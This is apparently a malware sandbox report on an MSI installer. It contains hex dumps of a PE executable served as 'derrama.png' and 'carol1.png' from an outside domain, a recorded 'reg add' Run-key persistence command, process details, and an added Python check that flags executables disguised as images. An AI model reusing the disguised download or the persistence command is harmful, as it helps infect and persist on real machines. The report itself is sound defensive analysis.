                              2024-08-02 12:16:48 UTC1369INData Raw: 00 06 03 7b 2a 00 00 04 8e 69 03 7b 2b 00 00 04 59 02 32 01 2a 03 7c 2a 00 00 04 02 03 7b 2b 00 00 04 58 16 03 7b 2b 00 00 04 28 cc 00 00 06 2a 8a 02 7b 26 00 00 04 2d 08 02 7b 24 00 00 04 2c 0b 72 aa 10 00 70 73 33 00 00 0a 7a 02 28 2a 00 00 06 2a 72 02 7b 26 00 00 04 2d 08 02 7b 24 00 00 04 2c 0b 72 06 11 00 70 73 33 00 00 0a 7a 2a 1e 02 7b 21 00 00 04 2a c2 02 7b 24 00 00 04 2d 27 02 7b 2b 00 00 04 2c 1f 02 7b 20 00 00 04 02 7b 2a 00 00 04 16 02 7b 2b 00 00 04 6f bf 00 00 0a 02 16 7d 2b 00 00 04 2a 00 13 30 04 00 61 00 00 00 11 00 00 11 1b 03 28 2c 00 00 06 16 0a 03 7b 2a 00 00 04 03 25 7b 2b 00 00 04 0b 07 17 58 7d 2b 00 00 04 07 02 1f 7f 5f 20 80 00 00 00 60 d2 9c 06 17 58 0a 02 1d 64 25 10 00 2d d1 03 7b 2a 00 00 04 03 7b 2b 00 00 04 17 59 8f 2b 00
                              Data Ascii: {*i{+Y2*|*{+X{+(*{&-{$,rps3z(**r{&-{$,rps3z*{!*{$-'{+,{ {*{+o}+*0a(,{*%{+X}+_ `Xd%-{*{+Y+
                              2024-08-02 12:16:48 UTC1369INData Raw: 1f 18 63 d2 9c 06 07 1a 58 06 07 1b 58 06 07 1c 58 06 07 1d 58 16 25 0d 9c 09 25 0d 9c 09 25 0d 9c 09 9c 1e 03 28 20 00 00 06 2a 02 28 32 00 00 06 03 28 31 00 00 06 03 15 7d 25 00 00 04 2a 02 16 32 0f 02 03 28 31 00 00 06 03 15 7d 25 00 00 04 2a 1f 0a 03 28 2c 00 00 06 03 7b 2a 00 00 04 0a 03 7b 2b 00 00 04 0b 06 07 02 20 80 00 00 00 60 d2 9c 06 07 17 58 02 1d 63 20 80 00 00 00 60 d2 9c 06 07 18 58 02 1f 0e 63 20 80 00 00 00 60 d2 9c 06 07 19 58 02 1f 15 63 20 80 00 00 00 60 d2 9c 06 07 1a 58 02 1f 1c 63 20 80 00 00 00 60 d2 9c 06 07 1b 58 06 07 1c 58 06 07 1d 58 06 07 1e 58 20 ff 00 00 00 25 0d 9c 09 25 0d 9c 09 25 0d 9c 09 9c 06 07 1f 09 58 17 9c 1f 0a 03 28 20 00 00 06 2a 03 28 42 00 00 06 7a 00 00 13 30 02 00 4e 00 00 00 0c 00 00 11 03 2d 0b 72 30 0d
                              Data Ascii: cXXXX%%%( *(2(1}%*2(1}%*(,{*{+ `Xc `Xc `Xc `Xc `XXXX %%%X( *(Bz0N-r0
                              2024-08-02 12:16:48 UTC1369INData Raw: 58 0a 91 0b 04 04 4b 07 1f 7f 5f 1f 0e 62 60 54 07 20 80 00 00 00 5f 2d 02 19 2a 02 7b 41 00 00 04 19 33 07 02 28 87 00 00 06 7a 02 7b 3a 00 00 04 06 25 17 58 0a 91 0b 04 04 4b 07 1f 7f 5f 1f 15 62 60 54 07 20 80 00 00 00 5f 2d 02 1a 2a 02 7b 41 00 00 04 1a 33 07 02 28 87 00 00 06 7a 02 7b 3a 00 00 04 06 91 0b 04 04 4b 07 1f 1c 62 60 54 07 20 f0 00 00 00 5f 2d 02 1b 2a 03 2c 76 07 20 f0 00 00 00 5f 20 f0 00 00 00 33 68 02 7b 41 00 00 04 1f 0a 32 5e 02 7b 3a 00 00 04 06 17 58 25 0a 91 20 ff 00 00 00 33 4b 02 7b 3a 00 00 04 06 17 58 25 0a 91 20 ff 00 00 00 33 38 02 7b 3a 00 00 04 06 17 58 25 0a 91 20 ff 00 00 00 33 25 02 7b 3a 00 00 04 06 17 58 25 0a 91 20 ff 00 00 00 33 12 02 7b 3a 00 00 04 06 17 58 25 0a 91 17 33 03 1f 0a 2a 73 a8 00 00 0a 02 28 86 00 00
                              Data Ascii: XK_b`T _-*{A3(z{:%XK_b`T _-*{A3(z{:Kb`T _-*,v _ 3h{A2^{:X% 3K{:X% 38{:X% 3%{:X% 3{:X%3*s(
                              2024-08-02 12:16:48 UTC1369INData Raw: 40 00 00 04 02 02 7b 41 00 00 04 1e 59 7d 41 00 00 04 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1e 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 10 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 18 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 20 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 28 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 30 62 60 02 7b 3a 00 00 04 02 02 7b 3f 00 00 04 0b 07 17 58 7d 3f 00 00 04 07 91 6e 1f 38 62 60 2a 02 28 66 00 00 06 28 63 00
                              Data Ascii: @{AY}A{:{?X}?n{:{?X}?nb`{:{?X}?nb`{:{?X}?nb`{:{?X}?n b`{:{?X}?n(b`{:{?X}?n0b`{:{?X}?n8b`*(f(c
                              2024-08-02 12:16:48 UTC1369INData Raw: 2d 11 72 15 09 00 70 73 33 00 00 0a 04 28 86 00 00 06 7a 04 28 70 00 00 06 03 16 32 12 04 7b 3b 00 00 04 03 02 04 6f 3e 01 00 06 10 00 2b 26 05 14 28 b1 00 00 0a 2c 17 04 7b 3b 00 00 04 04 16 17 05 0f 00 17 16 17 16 6f 37 01 00 06 2d 06 05 28 41 01 00 06 04 28 6f 00 00 06 02 2a 00 13 30 03 00 b3 00 00 00 0f 00 00 11 03 2d 0b 72 89 09 00 70 73 1b 00 00 0a 7a 02 7b 38 00 00 04 0a 03 7b 43 00 00 04 0b 07 1a 33 41 06 16 32 11 72 97 09 00 70 73 b2 00 00 0a 03 28 86 00 00 06 7a 06 65 03 7b 3c 00 00 04 2e 0c 03 72 a3 09 00 70 6f 6b 00 00 06 7a 03 15 7d 43 00 00 04 03 25 7b 3d 00 00 04 17 59 7d 3d 00 00 04 2a 06 03 7b 40 00 00 04 2f 0c 03 72 cf 09 00 70 6f 6b 00 00 06 7a 03 7b 42 00 00 04 03 7b 40 00 00 04 2e 19 03 7b 42 00 00 04 20 ff ff ff 7f 2e 0c 03 72 0b 0a
                              Data Ascii: -rps3(z(p2{;o>+&(,{;o7-(A(o*0-rpsz{8{C3A2rps(ze{<.rpokz}C%{=Y}=*{@/rpokz{B{@.{B .r


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               1 | 192.168.2.9 | 49707 | 188.114.97.3 | 443 | 7176 | C:\Windows\SysWOW64\msiexec.exe
                               Timestamp | Bytes transferred | Direction | Data
                               2024-08-02 12:16:49 UTC | 165 bytes | OUT | GET /derrama.png HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                              Host: yznv.prefintions.pro
                               2024-08-02 12:16:49 UTC | 685 bytes | IN | HTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:49 GMT
                              Content-Type: image/png
                              Content-Length: 358000
                              Connection: close
                              Last-Modified: Fri, 16 Feb 2024 08:56:10 GMT
                              ETag: "57670-6117bea4f9e80"
                              Cache-Control: max-age=14400
                              CF-Cache-Status: MISS
                              Accept-Ranges: bytes
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4mZlDEbatzoGft89ux8rMPw9tIgH9I7J4MIoU8fYvGuXmfu8%2BliLI3TcPdYYKcojWTe4V9xOsQTxgmUW1fbjUbL0YPDOfbc2W7H41jEiSC4GXYjgkq9nFQBVmyFq24lUjUwl2WRvbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ace00558ccf17b5-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-02 12:16:49 UTC684INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ba 9c 67 2e fe fd 09 7d fe fd 09 7d fe fd 09 7d 2d 8f 0a 7c f4 fd 09 7d 2d 8f 0c 7c 5b fd 09 7d ac 88 0d 7c ec fd 09 7d ac 88 0a 7c e9 fd 09 7d ac 88 0c 7c aa fd 09 7d 45 88 0c 7c fc fd 09 7d 2d 8f 0d 7c e9 fd 09 7d 2d 8f 0f 7c ff fd 09 7d 2d 8f 08 7c f0 fd 09 7d fe fd 09 7d fd fd 09 7d fe fd 08 7d 7b fc 09 7d 45 88 00 7c db fd 09 7d 45 88 f6 7d ff fd 09 7d fe fd 9e 7d ff fd 09
                              Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$g.}}}-|}-|[}|}|}|}E|}-|}-|}-|}}}}{}E|}E}}}
                              2024-08-02 12:16:49 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii:
                              2024-08-02 12:16:49 UTC1369INData Raw: ca 34 2b 7c d1 8d 34 26 47 10 56 52 51 8b 64 fc bc 6b ff 2e 6a 33 c9 66 89 0c 06 8b c7 c2 5b c5 08 00 3d fe ee 7e 83 17 3a 7f 0f 87 a7 77 f0 83 ce 07 81 fe 21 76 07 be 1f f6 bb ef 0d eb 1e 8b cb b8 11 d1 e9 2b c1 3b d8 2b 08 8d 04 19 0b 7e 68 f8 3b f0 0f 42 f0 c6 01 a4 00 13 3c 76 f8 89 de c5 db ed 77 14 89 c4 89 4f 10 ec 09 56 ff 75 a5 eb ef 6f e0 ce e4 ee eb 33 30 8b 07 8d 1c 5d 02 da 81 85 2d f8 c3 fb 00 50 72 12 8b 48 2e c3 23 bc 3c c1 c7 8e 37 0e f8 1f 77 1c 7a 53 50 a7 61 3a 7c 2b f8 08 89 07 59 2e 81 ab 5d 2c bf fd c5 18 1f d8 8b 4e 14 83 f9 b4 2d 8b 06 8d 0c 4d a4 69 4e 2e f9 50 c1 c2 f1 8a 8b fc 21 8b c2 51 ae 4d 33 c0 d1 f0 2e 58 51 40 06 5e c3 bf df ff fd 8b 8f 76 3d 86 7f 77 43 03 c0 3d b3 23 8d 48 23 3b 4d a7 1d f1 c8 76 33 51 7f 8b c8 1e 5e
                              Data Ascii: 4+|4&GVRQdk.j3f[=~:w!v+;+~h;B<vwOVuo30]-PrH.#<7wzSPa:|+Y.],N-MiN.P!QM3.XQ@^v=wC=#H#;Mv3Q^
                              2024-08-02 12:16:49 UTC1369INData Raw: 23 34 fc ec 55 51 44 8b f0 89 75 54 f6 3a 51 42 b8 de 32 c0 49 d4 ef 7a e2 03 05 db 0f 9e 8d 4e 1e d3 ee 8c 1b 32 ec 7b 20 f4 74 1e ed 15 a8 b6 7f 07 36 ef 0c 89 37 89 5f 04 f0 ff 06 a0 b0 01 ce 03 3f 5c cc 28 08 40 08 83 6e b7 06 3c 02 38 68 40 a7 3f c8 94 0c c8 6c 70 78 77 11 96 0c 64 bf a3 48 ab c4 1e 96 0c 73 3f 1d e5 80 01 4f fc 08 e8 bc 3a 4b ec 50 10 b9 41 cd 29 23 3e c0 08 97 ac e2 0c 01 fc 42 38 80 59 25 8e d4 f4 fe 4a 10 bc bb 08 06 f1 62 35 8d 85 23 50 53 6a 06 6a d5 03 1c df 10 75 1b ea 74 4d 61 c8 0b 83 e0 7a e9 fc 76 b4 7b a6 96 10 81 40 1e cb 40 2b ca 45 06 53 c3 84 02 56 de 68 a1 57 69 0b 28 e4 a4 f8 52 a1 da 62 17 cf 08 15 15 95 4c 8d 67 d6 fc 57 8d 51 01 66 90 8a 01 41 84 f9 9c 75 03 c8 6c d9 bf 10 6e 11 80 79 ff 5c 74 0b 49 25 20 77 ef
                              Data Ascii: #4UQDuT:QB2IzN2{ t67_?\(@n<8h@?lpxwdHs?O:KPA)#>B8Y%Jb5#PSjjutMazv{@@+ESVhWi(RbLgWQfAulny\tI% w
                              2024-08-02 12:16:49 UTC1369INData Raw: 38 ab 08 df a7 76 09 ee 34 3c 5d 3c e9 2b a9 35 52 a9 f8 ac 50 14 fb 44 08 a3 54 0a 7f 86 80 03 be 00 c5 4e 0c e4 28 53 b5 8f 34 06 68 ac f8 58 5f 5c 52 da f7 07 1a 2c c7 46 6c c5 c6 10 70 df 62 00 8c 42 a9 9e b8 04 3f 6a ec a9 14 1f 59 bc a7 8b 41 6c 56 87 b0 e0 eb 8d 71 6c cc 59 ca 0c ba 96 d1 55 54 7e 00 50 8d 8d fc eb 17 f2 85 15 50 f7 24 f3 8e 1c 70 16 fb 2f 38 0f ff 07 d9 20 bc 21 72 8d 50 01 90 8a 08 40 84 c9 3a c2 f5 5c b3 05 be 40 50 33 50 91 06 8d 48 11 56 8d df 7e d8 5e 1b c0 23 c1 7f 1f 0b e0 00 47 8b 35 d9 19 74 25 7e 83 cb ff 8b 4f 6c 8e 2b 8b c3 ad 83 df 0a f0 77 6c ff d2 6d 57 c7 47 ef 7f 17 3f b0 0c eb 8b 47 64 68 24 5e 18 4b 75 0f 19 69 01 69 60 64 54 64 68 ab 0a 68 58 8d 47 98 07 cf 1a 2c 80 c9 74 57 1d 8f 30 18 54 41 39 12 17 60 b6 b8
                              Data Ascii: 8v4<]<+5RPDTN(S4hX_\R,FlpbB?jYAlVqlYUT~PP$p/8 !rP@:\@P3PHV~^#G5t%~Ol+wlmWG?Gdh$^Kuii`dTdhhXG,tW0TA9`
                              2024-08-02 12:16:49 UTC1369INData Raw: 4d f8 22 8b 4f 28 28 3b c8 73 18 61 c3 03 0d 20 0c d8 29 5c 6a fc ed bb 8a 4c eb 39 50 52 8b d1 69 44 84 f6 05 5a 2a 13 f8 eb 0d 67 a9 3c ef 3d d8 89 6d f4 25 21 1c ee ef 8f e1 79 65 cf 8b c3 2b c6 1e 3b c7 73 36 c4 c3 25 34 d7 e5 45 d3 4a 47 f2 35 76 d2 70 14 e9 d8 53 08 be 82 74 e3 00 57 52 8b 21 f7 eb bc 01 fe 4f 05 bf 53 8b d9 56 89 5d f8 0f b7 43 f8 1f 0e 0f 7f 73 10 6b c0 2c 03 c6 ae 3b c8 84 74 3c 13 6f ff 41 da c6 24 57 0f 1f 40 f0 3e ff d0 57 75 a3 27 8e c1 06 b1 76 52 d8 b4 db fc fe 13 46 dc 3b c3 69 75 d6 f8 5f 98 5c 56 34 2b 12 86 5a 89 c2 04 10 f2 9a f5 24 63 3f 96 50 91 71 55 6b 21 35 f4 4d cf ac 8b ae 6c 4f 83 7e 04 bc 21 99 de 82 eb 8b 0e 8d d2 7a a7 19 e2 2b d6 43 9c 76 0c 35 06 ad 88 97 2e 15 d0 76 c8 10 74 30 f8 ff 7f 7f f9 8b f8 b8 cd
                              Data Ascii: M"O((;sa )\jL9PRiDZ*g<=m%!ye+;s6%4EJG5vpStWR!OSV]Csk,;t<oA$W@>Wu'vRF;iu_\V4+Z$c?PqUk!5MlO~!z+Cv5.vt0
                              2024-08-02 12:16:49 UTC1369INData Raw: 38 f0 e4 d4 89 10 8b cb 94 05 a2 2d 01 87 3b b6 29 cb 49 73 14 1f 53 d4 d4 c9 43 64 90 ec e8 ea d4 44 0f 44 43 66 17 f0 3b 30 14 1b 74 d8 39 a9 57 51 da 9c c8 ad 4e 28 4f 81 44 55 90 51 09 26 cc 56 94 fd c5 a3 50 05 53 4b 8b c7 eb 0b 13 ac 86 85 f1 d7 00 5b 43 51 44 56 11 1f 75 c6 c2 48 28 30 24 e0 9e 70 38 d4 33 f0 72 2b 0e c9 05 32 14 17 ec ec 06 a4 f2 62 0f cc 57 ba 34 1d 64 48 cf 3d 3e 05 48 a6 aa 18 09 7d e5 28 48 75 31 53 7b 18 28 58 58 62 04 48 55 a5 96 4b 04 18 45 09 e3 43 8a 0b a2 00 93 0c 37 1c 16 13 03 1f f0 5c f4 d0 20 c2 58 24 fc 94 3b 8b 37 00 1b 50 05 ec 5a 3f 69 db 4a a5 37 00 80 78 aa 74 21 10 04 7c 01 4e 58 75 14 de b0 08 75 0b 8b f0 ef 77 7b 2a 64 39 10 f0 eb 18 1c 0e 80 79 42 0e d9 d7 04 c3 66 90 92 40 c8 37 f4 b6 b6 13 76 bc b2 75 ae
                              Data Ascii: 8-;)IsSCdDDCf;0t9WQN(ODUQ&VPSK[CQDVuH(0$p83r+2bW4dH=>H}(Hu1S{(XXbHUKEC7\ X$;7PZ?iJ7xt!|NXuuw{*d9yBf@7vu
                              2024-08-02 12:16:49 UTC1369INData Raw: e5 78 85 94 c1 e9 02 50 22 53 00 56 ec 26 56 50 51 93 eb 15 d2 7d ce 75 89 b6 52 18 8d 73 10 1e d2 bf 9d 60 43 6a 30 6c 01 89 43 04 8b 10 8f 02 d8 ea 22 06 1a b2 43 91 34 ba 1d 80 f1 b8 30 93 57 42 b0 91 74 2a 16 4e 3e f5 1c df 4e bb 11 80 06 18 cc 28 bb 16 04 ab 28 89 18 a1 97 32 20 23 57 ec 84 85 47 ce 3b 86 43 53 6a a7 10 98 2c 89 18 27 f6 b1 a3 2e dc 3f a8 22 1e 41 b6 41 28 46 fc b8 b8 f8 02 c8 d8 74 3e 6c 33 16 27 12 1e 80 9d 3e 8b fe 68 4f 1a b5 88 3e 38 32 dc 57 b5 04 df d7 fe 00 07 40 81 83 c3 04 76 75 dd 64 a8 68 08 f4 1f 28 bd b0 92 09 41 1a 85 a0 12 9a 7c 3a 18 02 fc 08 07 1e ba 20 b0 50 44 50 02 9b d2 ce c6 54 38 ae 06 ae 22 2e 8d 45 e0 eb e0 57 84 6b 12 a9 4a 96 1c c5 aa 61 c7 ad 7f fa a0 0a 4d 70 13 60 02 ea d0 46 66 83 e2 02 4c 13 d2 40 ff
                              Data Ascii: xP"SV&VPQ}uRs`Cj0lC"C40WBt*N>N((2 #WG;CSj,'.?"AA(Ft>l3'>hO>82W@vudh(A|: PDPT8".EWkJaMp`FfL@
                              2024-08-02 12:16:49 UTC1369INData Raw: 5d f8 f8 ab c3 62 56 74 20 56 c3 31 66 90 3b 7f af c8 a5 e2 04 a6 89 60 52 29 74 ed eb 00 31 3a eb 1a 8b 0a 59 0f 7e 36 6a 41 1a 3e d1 76 89 50 22 2e c1 d3 87 37 09 15 db be 62 70 a7 a3 e3 0b 8b 72 84 d1 b4 9e 29 9f 07 c7 c2 4a ee e6 4e 39 50 87 f3 f0 0d 39 0b 39 11 32 31 98 b0 eb 9b eb 1b 39 13 ea 81 f9 eb 19 e4 8b fe e9 05 f9 7a 25 0c e0 fa 8e 89 5e c1 95 86 e0 32 38 39 57 4c 38 5d be 33 d1 c0 50 92 50 1e c9 7d f8 8a 58 0c d3 83 1f 2f ec 54 da b6 8b d6 2d 0b 0a 7e b7 7d 82 a8 81 f5 4d 62 53 eb 5f c2 a6 8f 35 46 11 62 17 75 16 38 01 1c f4 d8 a9 59 dd 75 52 0c 38 d8 05 07 46 62 0e 5e 69 b1 0e 39 58 b1 50 43 04 39 18 7c 10 5a d8 cf 70 b2 1a 8a 5a 0c 54 fd 8a 69 ba bd 2b 92 88 42 0c cc 88 22 80 fb 01 f4 57 ae c2 0c d8 74 a2 e4 48 14 b6 2b ed c2 c0 d2 d9 2c
                              Data Ascii: ]bVt V1f;`R)t1:Y~6jA>vP".7bpr)JN9P99219z%^289WL8]3PP}X/T-~}MbS_5Fbu8YuR8Fb^i9XPC9|ZpZTi+B"WtH+,
                              2024-08-02 12:16:49 UTC1369INData Raw: c8 50 12 3c 0a 61 15 71 01 48 1c 11 05 6a 68 44 c3 d6 d8 82 40 04 dc 6f ff 42 ed cc 2b c1 e8 72 20 8d 41 02 83 fa 10 44 d8 ba 3a 20 15 b6 82 30 32 0f 43 06 86 14 02 c0 37 12 e6 08 02 00 eb 14 ec 14 44 d5 e8 14 ec 76 b0 18 15 1b 82 fb ac 77 2c 18 b2 d0 51 ce 80 4a 10 66 70 f9 83 d9 a5 f1 55 b0 83 7d 3e c0 7c 14 ca 96 7e 84 36 be 75 d8 fe e0 51 52 76 02 69 ab a6 25 36 dc 10 26 ca c1 0a 98 c2 fa 03 f0 56 27 e0 05 ef 5e bb ba c6 04 06 d2 0c aa 51 c6 c3 42 c4 88 88 66 07 2a 72 0e c8 42 95 a7 ec 25 8f cb 00 0f 10 78 f2 ce b4 4f fd d8 0f 11 4d 98 d2 a8 ec ac 17 01 76 34 c0 7e c8 0f 07 83 8a 05 75 10 02 04 ea d8 3c 9c 18 5a 91 60 12 92 e4 2f c0 b3 15 94 c8 0e 89 4d e8 57 55 ac 05 0c 94 1e c5 07 21 8c 92 21 66 61 98 42 8d 43 8a 77 57 6a 4b 96 8b 53 0c 75 f8 38 89
                              Data Ascii: P<aqHjhD@oB+r AD: 02C7Dvw,QJfpU}>|~6uQRvi%6&V'^QBf*rB%xOMv4~u<Z`/MWU!!faBCwWjKSu8
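In both msiexec.exe sessions above the server at yznv.prefintions.pro labels carol1.png and derrama.png as image/png, yet each body opens with the MZ signature and the "This program cannot be run in DOS mode" stub of a Windows executable. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it sniffs a response body's magic bytes against the declared Content-Type and, when the body is a PE image, decodes the COFF TimeDateStamp so the link time can be set beside the server's Last-Modified header. The carol1.png bytes are transcribed from the hex dump above (only the DOS header, stub and file header are needed); the PNG response used as a control, the magic table and the function names are constructed for this example.

```python
"""Added example, not part of the Joe Sandbox report or of the sample: compare an
HTTP response body's magic bytes with its declared Content-Type and, if the body
is a PE image, decode the COFF TimeDateStamp for comparison with Last-Modified."""
import struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Optional

# Transcribed from the hex dump of the carol1.png response in the report:
# IMAGE_DOS_HEADER, DOS stub, PE signature, IMAGE_FILE_HEADER and the PE32 magic.
CAROL1_HEADERS = {
    "Content-Type": "image/png",
    "Content-Length": "702976",
    "Last-Modified": "Fri, 02 Aug 2024 00:37:11 GMT",
}
CAROL1_BODY = (
    bytes.fromhex("4d5a90000300000004000000ffff0000b8000000000000004000000000000000")
    + bytes(28) + b"\x80\x00\x00\x00"                 # e_lfanew = 0x80 at offset 0x3c
    + bytes.fromhex("0e1fba0e00b409cd21b8014ccd21")   # DOS stub code
    + b"This program cannot be run in DOS mode.\r\r\n$" + bytes(7)
    + b"PE\0\0"
    + bytes.fromhex("4c01" "0400" "3729ac66" "00000000" "00000000" "e000" "0221")
    + bytes.fromhex("0b010b00")                       # PE32 optional-header magic
)

# Constructed control (not in the report): a response whose body really is a PNG.
PNG_HEADERS = {"Content-Type": "image/png", "Last-Modified": "Mon, 01 Jul 2024 10:00:00 GMT"}
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + bytes(17)

# Magic-byte table, constructed for this example. First match wins.
MAGIC = [
    (b"MZ", "application/x-dosexec"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF8", "image/gif"),
    (b"PK\x03\x04", "application/zip"),
    (b"%PDF", "application/pdf"),
]


def sniff_media_type(body: bytes) -> str:
    """Return the media type implied by the body's leading bytes, or 'unknown'."""
    for magic, media_type in MAGIC:
        if body.startswith(magic):
            return media_type
    return "unknown"


def pe_timestamp(body: bytes) -> Optional[datetime]:
    """Return IMAGE_FILE_HEADER.TimeDateStamp as an aware UTC datetime, or None
    when the buffer is not a PE image or too short to hold the file header."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # IMAGE_FILE_HEADER: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", body, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def check_response(headers: dict, body: bytes) -> dict:
    """Compare declared and sniffed media type; for PE bodies, also report how
    long before the server's Last-Modified the image was linked."""
    declared = headers.get("Content-Type", "").split(";")[0].strip().lower()
    actual = sniff_media_type(body)
    result = {
        "declared": declared,
        "actual": actual,
        "mismatch": actual != "unknown" and actual != declared,
        "compile_time": None,
        "seconds_between_compile_and_upload": None,
    }
    stamp = pe_timestamp(body)
    if stamp is not None:
        result["compile_time"] = stamp
        if "Last-Modified" in headers:
            modified = parsedate_to_datetime(headers["Last-Modified"])
            result["seconds_between_compile_and_upload"] = int((modified - stamp).total_seconds())
    return result


def main() -> None:
    for name, headers, body in (("carol1.png", CAROL1_HEADERS, CAROL1_BODY),
                                ("control.png", PNG_HEADERS, PNG_BODY)):
        r = check_response(headers, body)
        print(f"{name}: declared={r['declared']} actual={r['actual']} mismatch={r['mismatch']}")
        if r["compile_time"] is not None:
            print(f"  PE TimeDateStamp {r['compile_time'].isoformat()} "
                  f"({r['seconds_between_compile_and_upload']} s before Last-Modified)")


if __name__ == "__main__":
    main()
```

Run stand-alone, the script reports the image/png versus PE mismatch for carol1.png and decodes its TimeDateStamp of 0x66ac2937, a few minutes before the Last-Modified the server returned. The derrama.png dump sets e_lfanew to 0x120, so its file header lies beyond the bytes the report prints and the same check would need the full body.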



                              Target ID:0
                              Start time:08:16:38
                              Start date:02/08/2024
                              Path:C:\Windows\System32\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\9rybs.msi"
                              Imagebase:0x7ff775930000
                              File size:69'632 bytes
                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:08:16:39
                              Start date:02/08/2024
                              Path:C:\Windows\System32\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\msiexec.exe /V
                              Imagebase:0x7ff775930000
                              File size:69'632 bytes
                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:3
                              Start time:08:16:39
                              Start date:02/08/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD
                              Imagebase:0xc0000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:08:16:53
                              Start date:02/08/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:08:16:53
                              Start date:02/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:08:16:53
                              Start date:02/08/2024
                              Path:C:\Windows\SysWOW64\reg.exe
                              Wow64 process (32bit):true
